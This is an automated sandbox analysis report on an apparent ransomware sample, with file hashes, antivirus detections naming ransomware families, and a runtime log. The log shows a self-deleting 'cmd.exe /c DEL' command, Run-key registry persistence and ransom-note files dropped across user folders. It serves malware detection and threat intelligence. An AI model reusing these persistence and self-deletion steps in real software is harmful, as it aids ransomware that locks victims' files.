Analysis Date2016-02-11 04:46:09
MD556897dbfc83e0ae0f4b7702350c0fdf1
SHA1780d4a09c1b60acf3961d04b7b3cfc9d8b89472f

Static Details:

File typePE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section.coat md5: 94e2f96f7a025201723af30a54119207 sha1: b83c17595631780eaf366681f8daa3920d5df160 size: 4608
Section.cbbl md5: b1335f715a6e854ef93a5e13ad071c4b sha1: fd6d715b95d78f67a4c7be4f55c88ddbb2ec44be size: 141824
Section.rdata md5: d819f1e206fa53c83eb08c3664c37cb6 sha1: d46485c980c04a4b60b0585fb44f656cc69bce53 size: 58880
Section.data md5: 4c3bbcdce6832bb7694eb253dd4a0372 sha1: 6db4e37e5e3a49a88142e4cad8adb821596c1ce8 size: 37376
Section.rsrc md5: 340bdaa4f9ce8979680588160e7aec1c sha1: 4f2e34082c391cc9fa06c8edde10707b557237d2 size: 187904
Timestamp2016-02-08 21:29:27
PackerMicrosoft Visual C++ ?.?
PEhashc4d807657e295b692a8fe3947630c326f3f46a28
IMPhashbd2a8f9ba380f160b10d2209983a6ae7
AVCA (E-Trust Ino)No Virus
AVRisingNo Virus
AVMcafeeBackDoor-FDCH!56897DBFC83E
AVAvira (antivir)TR/Crypt.Xpack.445813
AVTwisterNo Virus
AVAd-AwareGen:Variant.Midie.7265
AVAlwil (avast)Win32:Malware-gen
AVEset (nod32)Win32/Kryptik.ENJD
AVGrisoft (avg)Generic37.ALQJ
AVSymantecTrojan.Cryptlock.N!g2
AVFortinetW32/Bitman.ENJD!tr
AVBitDefenderGen:Variant.Midie.7265
AVK7No Virus
AVMicrosoft Security EssentialsNo Virus
AVMicroWorld (escan)No Virus
AVMalwareBytesRansom.FileLocker
AVAuthentiumW32/Rovnix.C.gen!Eldorado
AVEmsisoftGen:Variant.Midie.7265
AVFrisk (f-prot)No Virus
AVIkarusNo Virus
AVZillya!No Virus
AVKasperskyTrojan-Ransom.Win32.Bitman.iah
AVTrend MicroNo Virus
AVVirusBlokAda (vba32)No Virus
AVCAT (quickheal)No Virus
AVBullGuardNo Virus
AVArcabit (arcavir)Gen:Variant.Midie.7265
AVClamAVNo Virus
AVDr. WebTrojan.Inject1.56622
AVF-SecureGen:Variant.Midie.7265

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

Creates FileC:\Documents and Settings\Administrator\Application Data\lviqbfe.exe
Creates ProcessC:\WINDOWS\system32\cmd.exe /c DEL C:\780D4A~1.EXE
Creates ProcessC:\Documents and Settings\Administrator\Application Data\lviqbfe.exe

Process
↳ C:\WINDOWS\system32\cmd.exe /c DEL C:\780D4A~1.EXE

Process
↳ C:\Documents and Settings\Administrator\Application Data\lviqbfe.exe

RegistryHKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\dsfgsdf-67897869 ➝
C:\Documents and Settings\Administrator\Application Data\lviqbfe.exe\\x00
RegistryHKEY_CURRENT_USER\Software\A9ECE4DAD0EB049\data ➝
NULL
RegistryHKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLinkedConnections ➝
1
RegistryHKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\dsfgsdf-67897869 ➝
C:\Documents and Settings\Administrator\Application Data\lviqbfe.exe\\x00
RegistryHKEY_CURRENT_USER\Software\xxxsys\ID ➝
NULL
Creates FileC:\Documents and Settings\All Users\Documents\My Music\HELP_RECOVER_instructions+hec.html
Creates FileC:\Documents and Settings\Administrator\Recent\HELP_RECOVER_instructions+hec.html
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\HELP_RECOVER_instructions+hec.png
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\HELP_RECOVER_instructions+hec.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\Internet Explorer\HELP_RECOVER_instructions+hec.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\HELP_RECOVER_instructions+hec.html
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\Internet Explorer\Quick Launch\HELP_RECOVER_instructions+hec.png
Creates FileC:\Documents and Settings\Administrator\Application Data\Identities\{66520883-AF04-4437-A539-3E2F2944B956}\HELP_RECOVER_instructions+hec.html
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\SystemCertificates\My\HELP_RECOVER_instructions+hec.png
Creates FileC:\Documents and Settings\All Users\Documents\My Music\HELP_RECOVER_instructions+hec.png
Creates FileC:\Documents and Settings\Administrator\Favorites\HELP_RECOVER_instructions+hec.txt
Creates FileC:\Documents and Settings\Administrator\Start Menu\Programs\Startup\HELP_RECOVER_instructions+hec.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Linguistics\Dictionaries\Adobe Custom Dictionary\HELP_RECOVER_instructions+hec.html
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Linguistics\HELP_RECOVER_instructions+hec.png
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\9.0\JavaScripts\glob.js
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\HELP_RECOVER_instructions+hec.txt
Creates FileC:\Documents and Settings\All Users\Documents\My Music\My Playlists\HELP_RECOVER_instructions+hec.png
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Linguistics\Dictionaries\Adobe Custom Dictionary\brt\HELP_RECOVER_instructions+hec.txt
Creates FileC:\Documents and Settings\All Users\Documents\My Music\Sample Music\HELP_RECOVER_instructions+hec.txt
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\TypeSupport\HELP_RECOVER_instructions+hec.png
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\Media Player\HELP_RECOVER_instructions+hec.png
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\Internet Explorer\Quick Launch\HELP_RECOVER_instructions+hec.html
Creates FileC:\Documents and Settings\All Users\Documents\My Pictures\HELP_RECOVER_instructions+hec.png
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\Windows\Themes\HELP_RECOVER_instructions+hec.png
Creates FileC:\Documents and Settings\All Users\Documents\My Music\Sample Playlists\0019E545\HELP_RECOVER_instructions+hec.txt
Creates FileC:\Documents and Settings\Administrator\My Documents\HELP_RECOVER_instructions+hec.png
Creates FileC:\Documents and Settings\Administrator\Application Data\HELP_RECOVER_instructions+hec.txt
Creates FileC:\Documents and Settings\Administrator\Local Settings\History\History.IE5\MSHist012013052720130603\HELP_RECOVER_instructions+hec.png
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Linguistics\Dictionaries\Adobe Custom Dictionary\HELP_RECOVER_instructions+hec.txt
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\HELP_RECOVER_instructions+hec.png
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\Reader 9.3\Setup Files\Reader9\HELP_RECOVER_instructions+hec.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\7.0\Preferences\HELP_RECOVER_instructions+hec.png
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\dd_netfx20UI3716.txt
Creates FileC:\Documents and Settings\Administrator\Local Settings\History\HELP_RECOVER_instructions+hec.html
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Microsoft\Credentials\HELP_RECOVER_instructions+hec.html
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\7.0\Security\HELP_RECOVER_instructions+hec.html
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\HELP_RECOVER_instructions+hec.png
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\CryptnetUrlCache\MetaData\HELP_RECOVER_instructions+hec.png
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\BSDHA97U\HELP_RECOVER_instructions+hec.html
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\CryptnetUrlCache\HELP_RECOVER_instructions+hec.txt
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\Acrobat\9.0\HELP_RECOVER_instructions+hec.png
Creates FileC:\Documents and Settings\All Users\Documents\HELP_RECOVER_instructions+hec.html
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\IMJP8_1\HELP_RECOVER_instructions+hec.png
Creates FileC:\Documents and Settings\Administrator\HELP_RECOVER_instructions+hec.html
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\Internet Explorer\Quick Launch\HELP_RECOVER_instructions+hec.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\9.0\Forms\HELP_RECOVER_instructions+hec.txt
Creates FileC:\Documents and Settings\Administrator\PrintHood\HELP_RECOVER_instructions+hec.html
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\MMC\HELP_RECOVER_instructions+hec.txt
Creates FileC:\Documents and Settings\Administrator\My Documents\recover_file_txkgamkjj.txt
Creates FilePIPE\wkssvc
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\7.0\Updater\udstore.js
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Microsoft\Windows\HELP_RECOVER_instructions+hec.txt
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\HELP_RECOVER_instructions+hec.png
Creates FileC:\Documents and Settings\Administrator\Application Data\Identities\HELP_RECOVER_instructions+hec.html
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\Acrobat\9.0\Updater\HELP_RECOVER_instructions+hec.txt
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\Acrobat\9.0\Cache\HELP_RECOVER_instructions+hec.html
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\Credentials\S-1-5-21-XXXXXXXXXX-XXXXXXXXXX-XXXXXXXXXX-500\HELP_RECOVER_instructions+hec.html
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\7.0\JavaScripts\HELP_RECOVER_instructions+hec.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Linguistics\Dictionaries\Adobe Custom Dictionary\can\HELP_RECOVER_instructions+hec.png
Creates FileC:\Documents and Settings\All Users\Documents\My Music\Sample Music\New Stories (Highway Blues).wma
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Microsoft\Credentials\HELP_RECOVER_instructions+hec.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\9.0\Security\HELP_RECOVER_instructions+hec.html
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\658HSJSD\HELP_RECOVER_instructions+hec.txt
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Microsoft\Windows Media\HELP_RECOVER_instructions+hec.txt
Creates FileC:\Documents and Settings\Administrator\SendTo\HELP_RECOVER_instructions+hec.txt
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\IIQ3LGTM\HELP_RECOVER_instructions+hec.html
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\CryptnetUrlCache\Content\HELP_RECOVER_instructions+hec.png
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\9.0\Forms\HELP_RECOVER_instructions+hec.html
Creates FileC:\Documents and Settings\Administrator\Start Menu\Programs\Accessories\Entertainment\HELP_RECOVER_instructions+hec.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\SystemCertificates\My\HELP_RECOVER_instructions+hec.html
Creates FileC:\Documents and Settings\Administrator\Cookies\HELP_RECOVER_instructions+hec.png
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\Credentials\S-1-5-21-XXXXXXXXXX-XXXXXXXXXX-XXXXXXXXXX-500\HELP_RECOVER_instructions+hec.png
Creates FileC:\Documents and Settings\All Users\Documents\My Pictures\Sample Pictures\Winter.jpg
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Linguistics\Dictionaries\Adobe Custom Dictionary\HELP_RECOVER_instructions+hec.png
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\Color\HELP_RECOVER_instructions+hec.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\9.0\HELP_RECOVER_instructions+hec.txt
Creates FileC:\Documents and Settings\All Users\Documents\HELP_RECOVER_instructions+hec.txt
Creates FileC:\Documents and Settings\All Users\Documents\My Music\Sample Music\HELP_RECOVER_instructions+hec.html
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Linguistics\HELP_RECOVER_instructions+hec.txt
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\HELP_RECOVER_instructions+hec.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\Internet Explorer\HELP_RECOVER_instructions+hec.png
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\D4Z32ED8\HELP_RECOVER_instructions+hec.png
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\BSDHA97U\HELP_RECOVER_instructions+hec.png
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\Windows\Themes\HELP_RECOVER_instructions+hec.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\7.0\Preferences\HELP_RECOVER_instructions+hec.txt
Creates FileC:\Documents and Settings\All Users\Documents\My Pictures\Sample Pictures\Water lilies.jpg
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\Acrobat\9.0\Updater\HELP_RECOVER_instructions+hec.html
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Linguistics\Dictionaries\Adobe Custom Dictionary\can\HELP_RECOVER_instructions+hec.txt
Creates FileC:\Documents and Settings\Administrator\Recent\HELP_RECOVER_instructions+hec.png
Creates FileC:\Documents and Settings\All Users\Documents\My Music\My Playlists\HELP_RECOVER_instructions+hec.html
Creates FileC:\Documents and Settings\Administrator\Start Menu\Programs\HELP_RECOVER_instructions+hec.txt
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\Color\HELP_RECOVER_instructions+hec.png
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Linguistics\Dictionaries\Adobe Custom Dictionary\all\HELP_RECOVER_instructions+hec.png
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Linguistics\Dictionaries\HELP_RECOVER_instructions+hec.png
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\SystemCertificates\HELP_RECOVER_instructions+hec.html
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Microsoft\Credentials\HELP_RECOVER_instructions+hec.png
Creates FileC:\Documents and Settings\All Users\Documents\My Videos\HELP_RECOVER_instructions+hec.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\Credentials\HELP_RECOVER_instructions+hec.png
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Microsoft\Credentials\S-1-5-21-XXXXXXXXXX-XXXXXXXXXX-XXXXXXXXXX-500\HELP_RECOVER_instructions+hec.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Linguistics\Dictionaries\Adobe Custom Dictionary\brt\HELP_RECOVER_instructions+hec.png
Creates FileC:\Documents and Settings\Administrator\Application Data\HELP_RECOVER_instructions+hec.html
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\Windows\Themes\HELP_RECOVER_instructions+hec.html
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\Acrobat\7.0\Cache\HELP_RECOVER_instructions+hec.png
Creates FileC:\Documents and Settings\All Users\Documents\My Videos\HELP_RECOVER_instructions+hec.png
Creates FileC:\Documents and Settings\Administrator\Start Menu\Programs\Accessories\Entertainment\HELP_RECOVER_instructions+hec.html
Creates FileC:\Documents and Settings\Administrator\Templates\winword.doc
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Linguistics\Dictionaries\HELP_RECOVER_instructions+hec.html
Creates FileC:\Documents and Settings\Administrator\NetHood\HELP_RECOVER_instructions+hec.txt
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\HELP_RECOVER_instructions+hec.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\Identities\{66520883-AF04-4437-A539-3E2F2944B956}\HELP_RECOVER_instructions+hec.png
Creates FileC:\Documents and Settings\Administrator\NetHood\HELP_RECOVER_instructions+hec.png
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Linguistics\Dictionaries\Adobe Custom Dictionary\eng\HELP_RECOVER_instructions+hec.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\IMJP8_1\HELP_RECOVER_instructions+hec.html
Creates FileC:\Documents and Settings\Administrator\Start Menu\Programs\Accessories\Accessibility\HELP_RECOVER_instructions+hec.html
Creates FileC:\Documents and Settings\Administrator\Start Menu\Programs\HELP_RECOVER_instructions+hec.html
Creates FileC:\Documents and Settings\Administrator\NetHood\shared on Samba 3.6.9-151.el6 (192.168.1.1)\HELP_RECOVER_instructions+hec.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Linguistics\Dictionaries\Adobe Custom Dictionary\brt\HELP_RECOVER_instructions+hec.html
Creates FileC:\Documents and Settings\Administrator\NetHood\HELP_RECOVER_instructions+hec.html
Creates FileC:\Documents and Settings\Administrator\Start Menu\Programs\Startup\HELP_RECOVER_instructions+hec.html
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\Reader 9.3\Setup Files\HELP_RECOVER_instructions+hec.html
Creates FileC:\Documents and Settings\Administrator\Application Data\Identities\HELP_RECOVER_instructions+hec.png
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Microsoft\HELP_RECOVER_instructions+hec.html
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\Updater6\Install\HELP_RECOVER_instructions+hec.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\7.0\Security\HELP_RECOVER_instructions+hec.txt
Creates FileC:\Documents and Settings\Administrator\Local Settings\History\HELP_RECOVER_instructions+hec.txt
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Microsoft\Windows Media\HELP_RECOVER_instructions+hec.png
Creates FileC:\Documents and Settings\Administrator\Application Data\Identities\{66520883-AF04-4437-A539-3E2F2944B956}\HELP_RECOVER_instructions+hec.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\SystemCertificates\My\CTLs\HELP_RECOVER_instructions+hec.png
Creates FileC:\Documents and Settings\Administrator\Start Menu\HELP_RECOVER_instructions+hec.png
Creates FileC:\Documents and Settings\All Users\Documents\My Pictures\Sample Pictures\HELP_RECOVER_instructions+hec.png
Creates FileC:\Documents and Settings\Administrator\Local Settings\HELP_RECOVER_instructions+hec.png
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\WERfd9e.dir00\HELP_RECOVER_instructions+hec.html
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\WERfd9e.dir00\HELP_RECOVER_instructions+hec.png
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\7.0\HELP_RECOVER_instructions+hec.png
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\HELP_RECOVER_instructions+hec.png
Creates FileC:\Documents and Settings\Administrator\Favorites\Links\HELP_RECOVER_instructions+hec.html
Creates FileC:\Documents and Settings\Administrator\My Documents\My Music\HELP_RECOVER_instructions+hec.png
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\TypeSupport\HELP_RECOVER_instructions+hec.html
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Microsoft\Internet Explorer\HELP_RECOVER_instructions+hec.png
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\MMC\HELP_RECOVER_instructions+hec.html
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\7.0\Updater\HELP_RECOVER_instructions+hec.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\Credentials\S-1-5-21-XXXXXXXXXX-XXXXXXXXXX-XXXXXXXXXX-500\HELP_RECOVER_instructions+hec.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\Internet Explorer\brndlog.txt
Creates FileC:\Documents and Settings\All Users\Documents\My Pictures\Sample Pictures\Blue hills.jpg
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\IIQ3LGTM\HELP_RECOVER_instructions+hec.png
Creates FileC:\Documents and Settings\Administrator\Favorites\Links\HELP_RECOVER_instructions+hec.txt
Creates FileC:\Documents and Settings\Administrator\Start Menu\Programs\Accessories\Accessibility\HELP_RECOVER_instructions+hec.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\CryptnetUrlCache\HELP_RECOVER_instructions+hec.html
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\SystemCertificates\My\Certificates\HELP_RECOVER_instructions+hec.txt
Creates FileC:\Documents and Settings\Administrator\NetHood\shared on Samba 3.6.9-151.el6 (192.168.1.1)\HELP_RECOVER_instructions+hec.html
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\Credentials\HELP_RECOVER_instructions+hec.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\SystemCertificates\My\CTLs\HELP_RECOVER_instructions+hec.txt
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\Reader 9.3\Setup Files\Reader9\HELP_RECOVER_instructions+hec.html
Creates FileC:\Documents and Settings\Administrator\Start Menu\HELP_RECOVER_instructions+hec.html
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Microsoft\Windows Media\9.0\HELP_RECOVER_instructions+hec.html
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\7.0\Updater\HELP_RECOVER_instructions+hec.png
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\Acrobat\7.0\Cache\Search70\HELP_RECOVER_instructions+hec.txt
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\Reader 9.3\HELP_RECOVER_instructions+hec.html
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\Windows\HELP_RECOVER_instructions+hec.png
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\WERfd9e.dir00\manifest.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\SystemCertificates\My\Certificates\HELP_RECOVER_instructions+hec.html
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\SystemCertificates\My\CRLs\HELP_RECOVER_instructions+hec.html
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\IIQ3LGTM\HELP_RECOVER_instructions+hec.txt
Creates FileC:\Documents and Settings\Administrator\Local Settings\History\History.IE5\HELP_RECOVER_instructions+hec.html
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\658HSJSD\HELP_RECOVER_instructions+hec.png
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\CryptnetUrlCache\Content\HELP_RECOVER_instructions+hec.html
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\CryptnetUrlCache\MetaData\HELP_RECOVER_instructions+hec.html
Creates FileC:\Documents and Settings\Administrator\Local Settings\History\History.IE5\MSHist012013061320130614\HELP_RECOVER_instructions+hec.png
Creates FileC:\Documents and Settings\Administrator\My Documents\My Pictures\HELP_RECOVER_instructions+hec.html
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\7.0\Updater\udlog.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\AdobeUM\HELP_RECOVER_instructions+hec.png
Creates FileC:\Documents and Settings\Administrator\Templates\HELP_RECOVER_instructions+hec.html
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\9.0\JavaScripts\glob.settings.js
Creates FileC:\Documents and Settings\Administrator\Templates\winword2.doc
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\9.0\HELP_RECOVER_instructions+hec.html
Creates FileC:\Documents and Settings\Administrator\Local Settings\History\History.IE5\HELP_RECOVER_instructions+hec.txt
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\Microsoft Visual C++ 2010 x86 Redistributable Setup_10.0.30319\HELP_RECOVER_instructions+hec.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\HELP_RECOVER_instructions+hec.html
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\Acrobat\9.0\Cache\HELP_RECOVER_instructions+hec.png
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\Color\HELP_RECOVER_instructions+hec.html
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\SystemCertificates\HELP_RECOVER_instructions+hec.png
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\7.0\Updater\HELP_RECOVER_instructions+hec.html
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\7.0\JavaScripts\glob.settings.js
Creates FileC:\Documents and Settings\Administrator\Favorites\HELP_RECOVER_instructions+hec.png
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\HELP_RECOVER_instructions+hec.html
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\Reader 9.3\Setup Files\HELP_RECOVER_instructions+hec.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\Media Player\HELP_RECOVER_instructions+hec.html
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\TypeSupport\HELP_RECOVER_instructions+hec.txt
Creates FileC:\Documents and Settings\All Users\Documents\My Videos\HELP_RECOVER_instructions+hec.html
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Microsoft\Windows Media\9.0\HELP_RECOVER_instructions+hec.png
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\HELP_RECOVER_instructions+hec.html
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\SystemCertificates\My\CRLs\HELP_RECOVER_instructions+hec.png
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Microsoft\Credentials\S-1-5-21-XXXXXXXXXX-XXXXXXXXXX-XXXXXXXXXX-500\HELP_RECOVER_instructions+hec.html
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\Acrobat\7.0\Cache\Search70\HELP_RECOVER_instructions+hec.png
Creates FileC:\Documents and Settings\Administrator\My Documents\HELP_RECOVER_instructions+hec.txt
Creates FileC:\Documents and Settings\All Users\Documents\My Music\Sample Playlists\HELP_RECOVER_instructions+hec.html
Creates FileC:\Documents and Settings\All Users\Documents\My Music\My Playlists\HELP_RECOVER_instructions+hec.txt
Creates FileC:\Documents and Settings\All Users\Documents\My Pictures\HELP_RECOVER_instructions+hec.txt
Creates FileC:\Documents and Settings\Administrator\Templates\HELP_RECOVER_instructions+hec.txt
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\HELP_RECOVER_instructions+hec.txt
Creates FileC:\Documents and Settings\Administrator\Local Settings\HELP_RECOVER_instructions+hec.html
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\7.0\Collab\HELP_RECOVER_instructions+hec.html
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\Updater6\HELP_RECOVER_instructions+hec.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\AdobeUM\HELP_RECOVER_instructions+hec.html
Creates FileC:\Documents and Settings\Administrator\Favorites\HELP_RECOVER_instructions+hec.html
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\7.0\Collab\HELP_RECOVER_instructions+hec.png
Creates FileC:\Documents and Settings\Administrator\Favorites\Links\HELP_RECOVER_instructions+hec.png
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Microsoft\HELP_RECOVER_instructions+hec.png
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\Windows\HELP_RECOVER_instructions+hec.txt
Creates FileC:\Documents and Settings\Administrator\PrintHood\HELP_RECOVER_instructions+hec.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\9.0\Security\HELP_RECOVER_instructions+hec.txt
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\Acrobat\7.0\HELP_RECOVER_instructions+hec.png
Creates FileC:\Documents and Settings\Administrator\Start Menu\Programs\Accessories\HELP_RECOVER_instructions+hec.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\7.0\JavaScripts\HELP_RECOVER_instructions+hec.html
Creates FileC:\Documents and Settings\Administrator\Local Settings\History\History.IE5\HELP_RECOVER_instructions+hec.png
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\Reader 9.3\HELP_RECOVER_instructions+hec.txt
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\HELP_RECOVER_instructions+hec.png
Creates FileC:\Documents and Settings\All Users\Documents\My Music\HELP_RECOVER_instructions+hec.txt
Creates FileC:\Documents and Settings\Administrator\SendTo\HELP_RECOVER_instructions+hec.html
Creates FileC:\Documents and Settings\Administrator\Application Data\Identities\HELP_RECOVER_instructions+hec.txt
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\Microsoft Visual C++ 2010 x86 Redistributable Setup_20130508_125854937-MSI_vc_red.msi.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Linguistics\Dictionaries\Adobe Custom Dictionary\eng\HELP_RECOVER_instructions+hec.html
